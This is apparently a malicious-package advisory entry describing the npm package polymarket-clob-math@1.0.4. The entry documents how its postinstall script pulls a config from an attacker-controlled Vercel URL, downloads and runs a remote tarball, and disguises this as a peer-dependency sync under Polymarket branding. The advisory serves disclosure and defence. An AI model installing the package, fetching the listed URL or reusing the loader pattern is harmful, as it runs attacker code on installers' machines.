MAL-2026-6556

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (d67023e54ba355e9c82fd2a05d2d2448657a3ea9415ff18d3c4669a9fc0afb42) polymarket-clob-math@1.0.4 ships a postinstall lifecycle script that performs an install-time remote-code-execution drop. On `npm install`, the script fetches a JSON config from https://datasecure-service.vercel.app/config/clob-math.json (a non-publisher Vercel host repurposed as the package's `homepage`), resolves a tarball URL from that config, downloads and extracts the tarball, runs `npm install` inside the extracted directory, then `require()`s a file from the bundle and invokes it (`syncSession()`). The fetched bytes are unpinned, unhashed, mutable, and served from a domain unrelated to any Polymarket or publisher infrastructure. Internal naming (`PSM_PEER_URL`, `runPeerSync`, `peer-math.js`, `syncSession`, the warning `[polymarket-stake-math] install check skipped`) frames the loader as a benign peer-dependency sync, and the package name plus README branding (`polymarket-stake-math`, Kelly-stake-sizing for Polymarket binary markets) impersonate the Polymarket CLOB ecosystem to attract installs. Installing this package executes arbitrary attacker-controlled JavaScript on the installer's machine.